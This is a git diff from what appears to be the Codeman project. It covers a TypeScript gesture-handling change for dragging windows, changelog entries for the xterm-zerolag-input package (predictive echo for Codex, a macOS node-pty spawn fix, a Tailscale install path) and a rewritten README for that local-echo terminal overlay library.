* one per frame so per-frame drags don't thrash. `updateConnectionLines()` is
|
||||
* itself debounced in app.js, but we rAF-gate too in case an older dashboard
|
||||
* build isn't, and to no-op cleanly when app.js isn't present (standalone). */
|
||||
private redrawWindowConnectors(): void {
|
||||
if (this.connectorRedrawScheduled) return;
|
||||
this.connectorRedrawScheduled = true;
|
||||
requestAnimationFrame(() => {
|
||||
this.connectorRedrawScheduled = false;
|
||||
try {
|
||||
window.app?.updateConnectionLines?.();
|
||||
} catch {
|
||||
/* app.js may not expose it (standalone playground) */
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
/** Pop a grabbed window above its siblings using app.js's own z-counter, so a
|
||||
* picked-up window comes to the front like a real focus. Cosmetic + best-effort. */
|
||||
private bringWindowToFront(el: HTMLElement): void {
|
||||
const app = window.app;
|
||||
if (!app) return;
|
||||
try {
|
||||
if (el.classList.contains('ultracode-window')) {
|
||||
app.ultracodeWindowZIndex = (app.ultracodeWindowZIndex ?? 1000) + 1;
|
||||
el.style.zIndex = String(app.ultracodeWindowZIndex);
|
||||
} else {
|
||||
app.subagentWindowZIndex = (app.subagentWindowZIndex ?? 1000) + 1;
|
||||
el.style.zIndex = String(app.subagentWindowZIndex);
|
||||
}
|
||||
} catch {
|
||||
/* cosmetic only */
|
||||
}
|
||||
}
|
||||
|
||||
private positionGhost(ghost: HTMLElement, x: number, y: number): void {
|
||||
ghost.style.left = `${x}px`;
|
||||
ghost.style.top = `${y}px`;
|
||||
@@ -385,17 +512,19 @@ class GestureBridge {
|
||||
if (grab.kind === 'tab') {
|
||||
grab.ghost.remove();
|
||||
grab.tab.classList.remove('cg-grabbed');
|
||||
} else {
|
||||
} else if (grab.kind === 'panel') {
|
||||
grab.panel.el.style.pointerEvents = '';
|
||||
grab.panel.el.classList.remove('cg-float-grabbed', 'cg-redock');
|
||||
} else {
|
||||
grab.el.classList.remove('cg-win-grabbed');
|
||||
}
|
||||
}
|
||||
this.grabs.clear();
|
||||
for (const tap of this.taps.values()) tap.el.classList.remove('cg-tap-armed');
|
||||
this.taps.clear();
|
||||
document
|
||||
.querySelectorAll(`${TAB_SELECTOR}.cg-grabbed, .cg-tap-armed`)
|
||||
.forEach((t) => t.classList.remove('cg-grabbed', 'cg-tap-armed'));
|
||||
.querySelectorAll(`${TAB_SELECTOR}.cg-grabbed, .cg-tap-armed, .cg-win-grabbed`)
|
||||
.forEach((t) => t.classList.remove('cg-grabbed', 'cg-tap-armed', 'cg-win-grabbed'));
|
||||
}
|
||||
|
||||
private onStatus(fps: number, hands: HandState[]): void {
|
||||
@@ -491,6 +620,10 @@ function injectStyles(): void {
|
||||
.cg-status { color: #9aa0a6; max-width: 220px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; }
|
||||
.session-tab.cg-grabbed { opacity: .35; outline: 2px dashed #4ade80; outline-offset: -2px; }
|
||||
.cg-tap-armed { outline: 2px solid #4ade80 !important; outline-offset: 2px; box-shadow: 0 0 0 4px rgba(74,222,128,.25) !important; }
|
||||
.subagent-window.cg-win-grabbed, .ultracode-window.cg-win-grabbed {
|
||||
outline: 2px solid #4ade80 !important; outline-offset: -2px;
|
||||
box-shadow: 0 12px 48px rgba(74,222,128,.5) !important;
|
||||
}
|
||||
.cg-float {
|
||||
position: fixed; left: 0; top: 0; width: ${FLOAT_W}px; height: ${FLOAT_H}px;
|
||||
z-index: ${Z}; display: flex; flex-direction: column; overflow: hidden;
|
||||
|
||||
@@ -1,5 +1,94 @@
|
||||
# xterm-zerolag-input
|
||||
|
||||
## 0.3.0
|
||||
|
||||
### Minor Changes
|
||||
|
||||
- 55bff4a: Zero-lag predictive echo for Codex sessions (mosh-style write-through prediction).
|
||||
|
||||
Codex's per-keystroke composer forced 1.12.2 to disable the local-echo overlay (issues #218/#219/#220/#222), leaving Codex typing at full round-trip latency on remote links. This release adds a second echo mode instead of re-enabling the first: every keystroke still goes to the PTY exactly as before (byte-identical wire behavior, pinned by vm-level and end-to-end trace-equality tests), while the new `PredictiveEchoAddon` in `xterm-zerolag-input` 0.2.0 paints the predicted glyph at the predicted cell. When the real echo lands, the prediction is confirmed and its span removed (an invisible swap); mispredictions self-heal via a two-pass mismatch cascade and a TTL.
|
||||
- Reconciliation reads the parsed terminal buffer, never the raw stream: full-line redraws, ECH gap painting and tmux's in-place deltas all converge to the same cells. Confirmation requires the cell match PLUS a cursor advance, so placeholder glyphs and identical repaints never false-confirm; blank cells are neutral (codex clears its placeholder on the first echo).
|
||||
- Predictions paint only while the cursor sits on the measured Codex composer row (`/^› /`, codex-cli 0.147): trust/approval modals and wrapped continuation rows get no ghosts, deliberately falling back to real echo.
|
||||
- Ships as a SEPARATE `vendor/xterm-predictive-echo.js` bundle: the existing zerolag bundle is byte-identical (sha256-verified), and a missing or broken bundle degrades Codex to exact 1.12.2 behavior. The per-device `localEchoEnabled` toggle is the kill switch.
|
||||
- Claude/Gemini/OpenCode/Antigravity keep buffer mode untouched; shell stays off.
|
||||
- A post-build adversarial review added the anchor-hold rule: after an unpredicted wire edit (backspace into echoed text, cleared input, IME text commits) new predictions hold until the next parsed write, so a stale displayed cursor can never mis-anchor a run.
|
||||
- Tests: 55 new package tests including replay suites driven by fixtures recorded from a real codex TUI through the production tmux+strip pipeline (`scripts/dev/record-codex-frames.mjs`) and a 500-iteration seeded fuzz; new vm policy/wire-neutrality suites; a 10-scenario Playwright E2E against real codex covering the #218/#219/#220/#222 retests, byte-identity, and a simulated 300ms-RTT run. The package test suite now runs in CI.
|
||||
|
||||
## 0.2.0
|
||||
|
||||
### Minor Changes
|
||||
|
||||
- **New addon: `PredictiveEchoAddon`, mosh-style write-through prediction.** The second echo mode for per-keystroke TUIs (OpenAI Codex's composer, live pickers) that buffer-until-Enter starves. Every keystroke is sent by the consumer immediately and unchanged; the addon paints the predicted glyph at the predicted cell and reconciles against the PARSED terminal buffer: confirmation requires the cell match plus a cursor advance past the record, foreign non-blank content on two consecutive passes cascades a drop, blank cells are neutral, a TTL bounds everything, and scroll/resize/sustained cursor moves clear the run. Visual-only by construction; it cannot gate, delay or rewrite input.
|
||||
- Anchor-hold rule: after an unpredicted wire edit (backspace into echoed text, cleared input, an IME text commit) new predictions hold until the next parsed write, so a stale displayed cursor can never mis-anchor a run (worst case: exactly one unpredicted keystroke).
|
||||
- New exports: `PredictiveEchoAddon`, `PredictiveEchoOptions`, `PredictionState`, plus the long-intended `charCellWidth` / `stringCellWidth` helpers.
|
||||
- `XtermTerminal` type gains OPTIONAL members (`buffer.active.cursorX/cursorY`, `getLine().getCell?`, `onWriteParsed?`, `onResize?`). Additive only: existing consumers and mocks are unaffected.
|
||||
- IIFE build exposes `window.PredictiveEchoAddon` and a self-activating `window.PredictiveEchoOverlay`, alongside the unchanged `ZerolagInputAddon` / `LocalEchoOverlay` globals.
|
||||
- Tests: 52 new (30 addon-law specs, renderer geometry, 6 replay suites driven by fixtures recorded from real codex 0.147 through tmux + the production strip, and a 500-iteration seeded fuzz with per-op invariants). `@xterm/headless` as a devDependency; runtime dependencies remain zero.
|
||||
|
||||
## 0.1.8
|
||||
|
||||
### Patch Changes
|
||||
|
||||
- **Fixed: sessions failed to start on macOS with `Error: posix_spawnp failed.`** (issues #6 and #204)
|
||||
|
||||
`node-pty@1.1.0` publishes its macOS prebuilt helper as `prebuilds/darwin-<arch>/spawn-helper` with mode 0644, i.e. no execute bit. macOS launches every PTY through that helper, so a stock install failed on every session start. The bug is macOS-only: `spawn-helper` is a mac-only gyp target and node-pty ships no Linux prebuild, so Linux always compiles a correctly-permissioned helper from source.
|
||||
|
||||
The previous fix chmodded only `build/Release/spawn-helper`, which on macOS does not exist (the prebuild is used, so node-gyp never runs), and it derived that path from `require.resolve('node-pty')`, landing on `<pkg>/lib/build/Release/...`. It was a no-op on every platform.
|
||||
- New `scripts/fix-node-pty.mjs` (also `npm run fix:node-pty`) chmods every `spawn-helper` it finds, in `build/Release`, `build/Debug` and each `prebuilds/*/`, then verifies the result by actually opening a PTY. A `require()` alone passes on a broken install, because the helper is only touched at spawn time.
|
||||
- `postinstall` no longer force-rebuilds node-pty from source on Node 22+. That step needed Xcode command line tools, cost 30-120s on every install, and deleted the `prebuilds/` tree before compiling, so a Mac without a compiler was left with no working binary at all. A rebuild now happens only when the chmod plus spawn probe still fails, and the prebuilds tree is backed up and restored around it.
|
||||
- New `spawnPtyWithHelperRepair()` (`src/utils/node-pty-repair.ts`) wraps every `pty.spawn()` in `session.ts`, so an install that is already broken repairs itself on the first failed spawn and retries in-process instead of showing a dead session. Unrelated spawn errors are rethrown untouched; a second failure carries the `npm run fix:node-pty` hint.
|
||||
- `scripts/fix-node-pty.mjs` is now in the published `files` list, so global npm installs get the repair too.
|
||||
- Direct-PTY Claude spawns use the resolved absolute binary path (new `getClaudeBinaryPath()`) instead of the bare name `claude`, so a CLI installed outside the server's PATH still launches.
|
||||
|
||||
Verified end to end on macOS 26.4 arm64: a stock `npm i` reproduces `posix_spawnp failed.`, and after the fix the same install spawns a PTY successfully with the prebuilds preserved.
|
||||
|
||||
**Added: phone home screen (session overview)**
|
||||
|
||||
Under 430px the "C" logo now opens a session overview (current sessions, past sessions, spaces) instead of the welcome overlay: on a small screen "which session needs me" beats "how do I start one". Rows resume a session in place, and "New session here" goes through the normal quick-start path so remote and Docker cases keep their routing. Per-device setting `mobileOverviewEnabled` (phones only, default ON) in App Settings. Tablet and desktop are unchanged.
|
||||
|
||||
**Added: guided Tailscale setup in `install.sh`**
|
||||
|
||||
The network-access prompt is now 3-way: Tailscale, LAN, or local-only. The Tailscale path binds loopback and walks through installing Tailscale, logging in, the operator grant, the tailnet HTTPS-certificates toggle, and `tailscale serve --bg <port>`, then verifies the result end to end with curl. That gives HTTPS on a real certificate with no app password and no `0.0.0.0` bind, which is also what PWA install and web push need. `install.sh tailscale` retrofits it onto an existing install, and `CODEMAN_TAILSCALE=1` presets the choice. Serve state is detected from `tailscale serve status --json`; the installer never runs `tailscale serve reset` and never touches serve mappings other than 443 to Codeman's port. README and `docs/security-architecture.md` updated to match.
|
||||
|
||||
**Docs**: replaced a real tailnet hostname with placeholders in `docs/web-tabs-fixes-plan.md`.
|
||||
|
||||
**xterm-zerolag-input**: npm description and keywords only, no code change.
|
||||
|
||||
## 0.1.7
|
||||
|
||||
### Patch Changes
|
||||
|
||||
- Fix a latent bug where a partial settings PUT silently reset live service state, and trim the `xterm-zerolag-input` README callout.
|
||||
- **`PUT /api/settings` no longer resets watchers on a partial body.** The three `toggleService` calls (subagent watcher, workflow-run watcher, image watcher) read the raw request body with `??` defaults, so every key a caller omitted was treated as "apply the default". A body of just `{statusLineTelemetry:true}` would START the subagent watcher and STOP the workflow and image watchers, undoing the persisted config. They now resolve from `merged` (persisted settings + incoming), the same convention the `tmuxHistoryLimit` branch in that handler already used, so any PUT reconciles services to the effective stored state. Nothing triggered this in practice because every shipped client sends a full settings payload rebuilt from the DOM, but it was a trap for the next partial-update caller.
|
||||
- **Regression test**: `test/routes/system-routes-settings-partial-put.test.ts` (4 cases) pins both directions, omitted keys preserve state and explicit keys still take effect. Verified to fail against the pre-fix handler.
|
||||
- **CLAUDE.md** records the rule under "Adding Features → App setting": anything acting on a setting in that handler must resolve from `merged`, never the request body.
|
||||
- **`xterm-zerolag-input` README**: removed the links line (getcodeman.com / install one-liner / star link) from the Codeman callout above the demo GIF. The callout keeps its links in the heading and body.
|
||||
|
||||
## 0.1.6
|
||||
|
||||
### Patch Changes
|
||||
|
||||
- Plan-usage chip now defaults ON on desktop, plus the reworked `xterm-zerolag-input` README.
|
||||
- **Plan-usage chip defaults ON (desktop).** The `showPlanUsageLimits` chip (live 5-hour and weekly plan usage from the Claude statusline) used to be opt-in and default OFF, so most users never saw it. Desktop now defaults ON; handhelds still default OFF so the phone header stays minimal and the `mobile-header-buttons-policy` guard keeps passing. Devices with an explicitly stored preference keep whatever they chose, so nobody's OFF gets overridden.
|
||||
- **One resolver behind the chip.** Added `planUsageChipEnabled()` in settings-ui.js and routed all three call sites through it: the App Settings checkbox, the chip's visibility, and the create-time `statusLineTelemetry` flag in session-ui.js. Those three had independent `?? false` / `=== true` defaults, and a chip revealed without the telemetry flag renders `—` forever, so a default flip on one site alone would have shipped a permanently empty chip.
|
||||
- **Cron button comment corrected.** The App Settings comment claimed "Cron button defaults ON" while the code, the template (`btn-cron--hidden`) and the CSS all default it OFF. Verified against a fresh browser profile: the button is hidden and its checkbox unchecked out of the box. Comment now matches, and states why the two halves stay consistent.
|
||||
- **Docs.** CLAUDE.md, `docs/architecture-invariants.md` and `docs/usage-limits-display-plan.md` updated for the new default and the single-resolver rule; the stale `styles.css` comment claiming the server strips the chip's hidden class at render was corrected (display is per-device, so the client reveals it).
|
||||
- **`xterm-zerolag-input` README rework** (0.1.5 shipped the content; this republishes with the graphic and promo changes): replaced the misaligned 8-line keystroke-flow diagram with a two-line stock-vs-zerolag contrast, added a Codeman callout above the demo GIF with links to getcodeman.com and the repo, and rewrote the Origin section so it argues the extraction story instead of repeating the promo.
|
||||
|
||||
## 0.1.5
|
||||
|
||||
### Patch Changes
|
||||
|
||||
- Rewrite the `xterm-zerolag-input` package README as a value-first document and correct the drift that had accumulated against the source.
|
||||
- Added the side-by-side phone demo GIF (`docs/images/zerolag-demo-20260728.gif`) as the hero image, referenced by absolute raw URL so it renders on npmjs.com as well as GitHub. The two-phone comparison shows 0ms local echo next to a 600ms-2.7s server echo on the same session.
|
||||
- New "Why this one" comparison table, an explicit list of target use cases (SSH web clients, cloud IDEs, mobile terminals, container consoles), and a bundle-size badge (6.1 kB gzipped, measured from the ESM build).
|
||||
- Corrected the test-count badge from 78 to the actual 175 tests across 5 files, in both the package README and the Published Packages section of the root README.
|
||||
- Removed the stale "Unicode/emoji rendered at single-cell width" limitation. CJK, fullwidth forms and emoji have had double-width rendering and visual-column positioning since the wide-character fix; the honest remaining caveat (per-code-point width summing over-counts ZWJ grapheme clusters) replaces it.
|
||||
- Documented the previously undocumented public `setPrompt()` method for switching prompt strategies at runtime, and the new "Wide characters (CJK, emoji)" integration section covering the optional `Unicode11Addon` path and the built-in range-table fallback.
|
||||
- Documented `backgroundColor: 'transparent'`, corrected the `foregroundColor` default, and updated the grid-alignment math to reflect visual-column positioning rather than character index.
|
||||
|
||||
No source changes, docs only.
|
||||
|
||||
## 0.1.4
|
||||
|
||||
### Patch Changes
|
||||
|
||||
@@ -1,45 +1,73 @@
|
||||
<p align="center">
|
||||
<h1 align="center">xterm-zerolag-input</h1>
|
||||
<p align="center">
|
||||
Instant keystroke feedback overlay for <a href="https://xtermjs.org/">xterm.js</a><br>
|
||||
<em>Eliminates perceived input latency over high-RTT connections</em>
|
||||
<strong>Make typing feel instant in <a href="https://xtermjs.org/">xterm.js</a>, no matter how far away the server is.</strong><br>
|
||||
<em>A pixel-perfect local echo overlay. Client-side only. Zero dependencies.</em>
|
||||
</p>
|
||||
<p align="center">
|
||||
<a href="https://www.npmjs.com/package/xterm-zerolag-input"><img src="https://img.shields.io/npm/v/xterm-zerolag-input?style=flat-square&color=22c55e" alt="npm"></a>
|
||||
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-1e3a5f?style=flat-square" alt="MIT"></a>
|
||||
<img src="https://img.shields.io/badge/Dependencies-0-22c55e?style=flat-square" alt="Zero deps">
|
||||
<img src="https://img.shields.io/badge/Tests-78-22c55e?style=flat-square" alt="78 tests">
|
||||
<img src="https://img.shields.io/badge/xterm.js-v5%20%7C%20v7+-3b82f6?style=flat-square" alt="xterm.js">
|
||||
<img src="https://img.shields.io/badge/Dependencies-0-22c55e?style=flat-square" alt="Zero dependencies">
|
||||
<img src="https://img.shields.io/badge/Size-6.1%20kB%20gzip-22c55e?style=flat-square" alt="6.1 kB gzipped">
|
||||
<img src="https://img.shields.io/badge/Tests-227-22c55e?style=flat-square" alt="175 tests">
|
||||
<img src="https://img.shields.io/badge/xterm.js-v5%20%7C%20v7+-3b82f6?style=flat-square" alt="xterm.js v5 and v7+">
|
||||
</p>
|
||||
</p>
|
||||
|
||||
> ### Made for [**Codeman**](https://getcodeman.com)
|
||||
>
|
||||
> This overlay is the local echo engine of [**Codeman**](https://github.com/Ark0N/Codeman), mission control for AI coding agents: run and monitor a dozen Claude Code, Codex, OpenCode and Antigravity sessions at once, watch their subagents work in live floating windows, let them run autonomously overnight, and drive all of it from your phone.
|
||||
>
|
||||
> That last part is why this library exists. The demo below is a real Codeman session on two phones.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/Ark0N/Codeman/master/docs/images/zerolag-demo-20260728.gif" alt="Side-by-side phones typing into the same remote session: with zerolag the text appears at 0ms, without it every keystroke waits 600ms to 2.7s for the server echo" width="900">
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<em>Two phones, the same remote session, the same slow link.<br>
|
||||
Left: the zerolag overlay paints every keystroke at <strong>0ms</strong>. Right: stock xterm.js waits <strong>600ms to 2.7s</strong> for the server to echo it back.</em>
|
||||
</p>
|
||||
|
||||
---
|
||||
|
||||
## The Problem
|
||||
## The 30-second version
|
||||
|
||||
When using xterm.js over a remote connection (SSH web clients, cloud IDEs, mobile terminals), every keystroke takes a full round-trip to the server before appearing on screen. At 100-500ms RTT, typing feels sluggish and unresponsive. Users type blind, make mistakes they can't see, and the experience feels broken.
|
||||
|
||||
## The Solution
|
||||
|
||||
`xterm-zerolag-input` renders typed characters **immediately** as a pixel-perfect DOM overlay positioned on the terminal's character grid. The overlay covers the terminal canvas at the prompt location, showing characters instantly while the server echo travels back. Once the server responds, the overlay seamlessly disappears and the real terminal text takes over.
|
||||
Over a remote connection, xterm.js shows you a character only after it has flown to the server and back. At 100-500ms RTT that reads as broken: you type ahead of the screen, you cannot see your typos, and you start pecking one key at a time to stay in sync.
|
||||
|
||||
```
|
||||
Keystroke Flow:
|
||||
┌─── DOM overlay (instant, 0ms)
|
||||
User types 'h' ─── onData('h') ───┤
|
||||
└─── Your app sends to PTY ──→ Server
|
||||
│
|
||||
Server echoes 'h' ←──────────────────────────────────────────────────┘
|
||||
│ (200-500ms RTT)
|
||||
└──→ terminal.write('h') ──→ overlay.clear()
|
||||
(server output replaces overlay — seamless transition)
|
||||
stock xterm.js keypress ─────── 300 ms ───────→ character appears
|
||||
with zerolag keypress → character appears · echo lands later, unseen
|
||||
```
|
||||
|
||||
**No changes to your backend needed.** The addon is purely client-side.
|
||||
Same keystroke, same link. The only difference is who you wait for: the server, or nobody.
|
||||
|
||||
## Origin
|
||||
`xterm-zerolag-input` paints your keystrokes **immediately**, as an absolutely-positioned DOM overlay locked to the terminal's character grid. The byte still goes to the PTY exactly as before, so nothing about your shell changes. When the server echo lands 300ms later, the overlay clears and the real terminal text takes over on the same pixels. The handoff is invisible.
|
||||
|
||||
This library was extracted from [Codeman](https://github.com/Ark0N/Codeman), mission control for AI coding agents — multi-session management, real-time agent visualization, autonomous respawn loops, and a mobile-first web UI for Claude Code, OpenCode, and Codex. The local echo system was built to make mobile and remote access feel instant, then battle-tested across thousands of hours of real usage. After 3 deep code audits, it was extracted into this standalone library with 78 tests covering every state transition.
|
||||
**No backend changes. No protocol. No server support.** It is a client-side addon that never touches the wire.
|
||||
|
||||
Since 0.2.0 the package ships **two addons for two kinds of TUIs**:
|
||||
|
||||
| Addon | Model | Use when |
|
||||
| --------------------- | -------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- |
|
||||
| `ZerolagInputAddon` | **Buffer**: hold keystrokes locally, flush on Enter | The remote side is a line-oriented prompt (shells, REPLs, Claude Code's composer) that only needs the finished line |
|
||||
| `PredictiveEchoAddon` | **Predictive write-through**: send every keystroke immediately, paint a prediction, confirm against the parsed buffer | The remote side is a per-keystroke TUI (OpenAI Codex's composer, live pickers) that buffering would starve |
|
||||
|
||||
`ZerolagInputAddon` is documented below; jump to [PredictiveEchoAddon](#predictiveechoaddon-write-through-prediction) for the second mode.
|
||||
|
||||
## Why this one
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| **Survives full-screen TUIs** | Ink, blessed, and friends repaint the whole screen constantly. The overlay is a separate DOM layer they cannot reach, so it does not get clobbered. |
|
||||
| **Pixel-matched to the canvas** | Each character is its own absolutely-positioned `<span>` at exact cell coordinates, so it does not drift out of the grid like normal DOM text flow. |
|
||||
| **Wide characters included** | CJK, fullwidth forms and emoji render double-width and position by visual column, using the terminal's Unicode addon when one is loaded. |
|
||||
| **Backspace that actually works** | A three-layer cascade (unsent, in-flight, already on screen) tells you exactly what to forward to the PTY, so editing works through any mix of typed, flushed and tab-completed text. |
|
||||
| **You keep control of input** | The addon never hooks `onData` for you. You decide what gets echoed and what gets forwarded, which is what makes char-at-a-time, buffered, and multi-session tab switching all possible. |
|
||||
| **Small and self-contained** | 6.1 kB gzipped, zero runtime dependencies, dual CJS/ESM with full type declarations. |
|
||||
| **Proven under load** | Extracted from [Codeman](https://getcodeman.com), hardened over thousands of hours of real remote and mobile usage, 175 tests over every state transition. |
|
||||
|
||||
Built for anything that puts a terminal behind a network hop: SSH web clients, cloud IDEs, mobile terminals, Kubernetes and container consoles, remote agent dashboards, browser-based dev environments.
|
||||
|
||||
## Install
|
||||
|
||||
@@ -47,12 +75,9 @@ This library was extracted from [Codeman](https://github.com/Ark0N/Codeman), mis
|
||||
npm install xterm-zerolag-input
|
||||
```
|
||||
|
||||
- **Zero runtime dependencies**
|
||||
- Compatible with both `xterm` (pre-5.4) and `@xterm/xterm` (5.4+)
|
||||
- Dual CJS/ESM build with full TypeScript declarations
|
||||
- Works with canvas, WebGL, and DOM renderers
|
||||
Works with both `xterm` (pre-5.4) and `@xterm/xterm` (5.4+), and with the canvas, WebGL and DOM renderers.
|
||||
|
||||
## Quick Start
|
||||
## Quick start
|
||||
|
||||
```typescript
|
||||
import { Terminal } from '@xterm/xterm';
|
||||
@@ -61,7 +86,7 @@ import { ZerolagInputAddon } from 'xterm-zerolag-input';
|
||||
const terminal = new Terminal();
|
||||
terminal.open(document.getElementById('terminal')!);
|
||||
|
||||
// 1. Create addon with your prompt character
|
||||
// 1. Create the addon with your prompt character
|
||||
const zerolag = new ZerolagInputAddon({
|
||||
prompt: { type: 'character', char: '$', offset: 2 },
|
||||
});
|
||||
@@ -75,7 +100,7 @@ terminal.onData((data) => {
|
||||
ws.send(text + '\r');
|
||||
} else if (data === '\x7f') {
|
||||
const source = zerolag.removeChar();
|
||||
if (source === 'flushed') ws.send(data); // only backspace text already in PTY
|
||||
if (source === 'flushed') ws.send(data); // only backspace text already in the PTY
|
||||
} else if (data.length === 1 && data.charCodeAt(0) >= 32) {
|
||||
zerolag.addChar(data);
|
||||
}
|
||||
@@ -87,26 +112,29 @@ terminal.onWriteParsed(() => {
|
||||
});
|
||||
```
|
||||
|
||||
## Why This Is Hard
|
||||
That is the whole integration. Everything below is for tuning it.
|
||||
|
||||
Most terminal UIs can't do local echo because:
|
||||
## Why this is hard
|
||||
|
||||
1. **Buffer writes corrupt**: Frameworks like [Ink](https://github.com/vadimdemedes/ink) (React for terminals) redraw the entire screen on every state change. Writing directly to the terminal buffer gets immediately overwritten.
|
||||
Most terminal UIs cannot do local echo, for three reasons:
|
||||
|
||||
2. **Cursor position lies**: In Ink, `buffer.cursorY` reflects internal state (near the status bar), not the visible prompt. You can't trust it.
|
||||
1. **Buffer writes get corrupted.** Frameworks like [Ink](https://github.com/vadimdemedes/ink) (React for terminals) redraw the entire screen on every state change. Anything written straight into the terminal buffer is overwritten immediately.
|
||||
|
||||
3. **Font matching**: Canvas/WebGL renderers use their own text shaping. A DOM overlay must pixel-match the canvas grid — normal DOM text flow drifts due to sub-pixel glyph width differences.
|
||||
2. **Cursor position lies.** In Ink, `buffer.cursorY` reflects internal render state (often near a status bar), not the visible prompt. You cannot trust it.
|
||||
|
||||
This library solves all three by:
|
||||
- Using a **DOM overlay** that Ink can't touch (separate z-index layer)
|
||||
- **Scanning the buffer** bottom-up for the prompt character instead of trusting cursor position
|
||||
- Rendering each character as an **absolutely-positioned `<span>`** at exact cell-grid coordinates
|
||||
3. **Fonts do not line up.** Canvas and WebGL renderers do their own text shaping. A DOM overlay has to pixel-match that grid, and normal DOM text flow drifts as sub-pixel glyph widths accumulate.
|
||||
|
||||
This library answers all three:
|
||||
|
||||
- a **DOM overlay** on its own z-index layer, which Ink cannot touch
|
||||
- **bottom-up buffer scanning** for the prompt instead of trusting the cursor
|
||||
- **one absolutely-positioned `<span>` per character** at exact cell-grid coordinates
|
||||
|
||||
---
|
||||
|
||||
## Prompt Detection
|
||||
## Prompt detection
|
||||
|
||||
The addon needs to know where user input starts. It scans the terminal buffer bottom-up for the prompt. Three strategies:
|
||||
The addon needs to know where user input starts. It scans the terminal buffer bottom-up. Three strategies:
|
||||
|
||||
### Character (default)
|
||||
|
||||
@@ -118,17 +146,17 @@ The addon needs to know where user input starts. It scans the terminal buffer bo
|
||||
{ type: 'character', char: '%', offset: 2 }
|
||||
|
||||
// Fish / Starship: ❯
|
||||
{ type: 'character', char: '\u276f', offset: 2 }
|
||||
{ type: 'character', char: '❯', offset: 2 }
|
||||
|
||||
// Simple arrow: >
|
||||
{ type: 'character', char: '>', offset: 2 }
|
||||
```
|
||||
|
||||
`offset` = characters between the prompt marker and where user input begins (e.g., `"$ "` = 2).
|
||||
`offset` = characters between the prompt marker and where user input begins (`"$ "` = 2).
|
||||
|
||||
### Regex
|
||||
|
||||
For complex prompts. The `g` flag is safely stripped to prevent `lastIndex` mutation.
|
||||
For complex prompts. The `g` flag is stripped safely, so there is no `lastIndex` mutation.
|
||||
|
||||
```typescript
|
||||
{ type: 'regex', pattern: /\$\s*$/, offset: 2 }
|
||||
@@ -150,77 +178,88 @@ Full control:
|
||||
}
|
||||
```
|
||||
|
||||
### Switching prompts at runtime
|
||||
|
||||
If one terminal hosts several CLIs with different prompts, swap the strategy in place:
|
||||
|
||||
```typescript
|
||||
zerolag.setPrompt({ type: 'character', char: '❯', offset: 2 });
|
||||
```
|
||||
|
||||
`setPrompt()` clears the cached prompt position and re-renders if anything is pending, so a mode switch cannot leave the overlay pinned to the old column.
|
||||
|
||||
---
|
||||
|
||||
## API Reference
|
||||
## API reference
|
||||
|
||||
### `ZerolagInputAddon`
|
||||
|
||||
Implements xterm.js `ITerminalAddon`. The addon does **not** hook `terminal.onData()` — you wire your own input handler and call these methods. This gives you full control over which keystrokes are echoed vs forwarded.
|
||||
Implements the xterm.js `ITerminalAddon` interface. It deliberately does **not** hook `terminal.onData()`: you wire your own handler and call these methods, which is what gives you control over which keystrokes are echoed and which are forwarded.
|
||||
|
||||
### Input
|
||||
|
||||
| Method | Returns | Description |
|
||||
|--------|---------|-------------|
|
||||
| `addChar(char)` | `void` | Add a single printable character. Auto-detects existing buffer text on first keystroke. |
|
||||
| `addChar(char)` | `void` | Add a single printable character. Auto-detects existing buffer text on the first keystroke. |
|
||||
| `appendText(text)` | `void` | Append multiple characters (paste). |
|
||||
| `removeChar()` | `'pending'` \| `'flushed'` \| `false` | Remove last char. See [backspace handling](#backspace-handling). |
|
||||
| `clear()` | `void` | Clear all state, hide overlay. Call on Enter/Ctrl+C/Escape. |
|
||||
| `removeChar()` | `'pending'` \| `'flushed'` \| `false` | Remove the last character. See [backspace handling](#backspace-handling). |
|
||||
| `clear()` | `void` | Clear all state and hide the overlay. Call on Enter, Ctrl+C, Escape. |
|
||||
|
||||
### Backspace Handling
|
||||
### Backspace handling
|
||||
|
||||
`removeChar()` cascades through three layers and tells you what it removed:
|
||||
|
||||
| Return | Source | Your action |
|
||||
|--------|--------|-------------|
|
||||
| `'pending'` | Unsent text (never transmitted to PTY) | Do nothing |
|
||||
| `'flushed'` | Text already sent to PTY | Send `\x7f` backspace to PTY |
|
||||
| `'pending'` | Unsent text (never transmitted to the PTY) | Do nothing |
|
||||
| `'flushed'` | Text already sent to the PTY | Send `\x7f` to the PTY |
|
||||
| `false` | Nothing to remove | Do nothing |
|
||||
|
||||
The cascade: pending text first, then flushed text, then auto-detect buffer text (handles tab completion). This means backspace "just works" through any combination of typed, flushed, and tab-completed text.
|
||||
The cascade order is pending text, then flushed text, then auto-detected buffer text (which is what makes backspace work after tab completion). Backspace "just works" across any combination of typed, in-flight and completed text.
|
||||
|
||||
### Flushed Text
|
||||
### Flushed text
|
||||
|
||||
"Flushed" = sent to PTY but echo hasn't arrived yet. Happens during tab switches and tab completion.
|
||||
"Flushed" means sent to the PTY but the echo has not arrived yet. This happens during tab switches and tab completion.
|
||||
|
||||
| Method | Description |
|
||||
|--------|-------------|
|
||||
| `setFlushed(count, text, render?)` | Mark text as flushed. Pass `render=false` during tab-switch restore (buffer not loaded yet). |
|
||||
| `setFlushed(count, text, render?)` | Mark text as flushed. Pass `render=false` during tab-switch restore, when the buffer is not loaded yet. |
|
||||
| `getFlushed()` | Returns `{ count, text }`. |
|
||||
| `clearFlushed()` | Clear flushed state when server echo arrives. |
|
||||
| `clearFlushed()` | Clear flushed state once the server echo arrives. |
|
||||
|
||||
### Buffer Detection
|
||||
### Buffer detection
|
||||
|
||||
Scan the terminal for text that exists after the prompt but wasn't typed through the overlay.
|
||||
Finds text that exists after the prompt but was never typed through the overlay.
|
||||
|
||||
| Method | Description |
|
||||
|--------|-------------|
|
||||
| `detectBufferText()` | Scan and return detected text (or `null`). Sets it as flushed. Guarded: runs once per `clear()` cycle. |
|
||||
| `detectBufferText()` | Scan and return the detected text (or `null`), marking it flushed. Guarded: runs once per `clear()` cycle. |
|
||||
| `resetBufferDetection()` | Re-enable detection. |
|
||||
| `suppressBufferDetection()` | Block detection until next `clear()`. Use for sessions with UI framework text after the prompt. |
|
||||
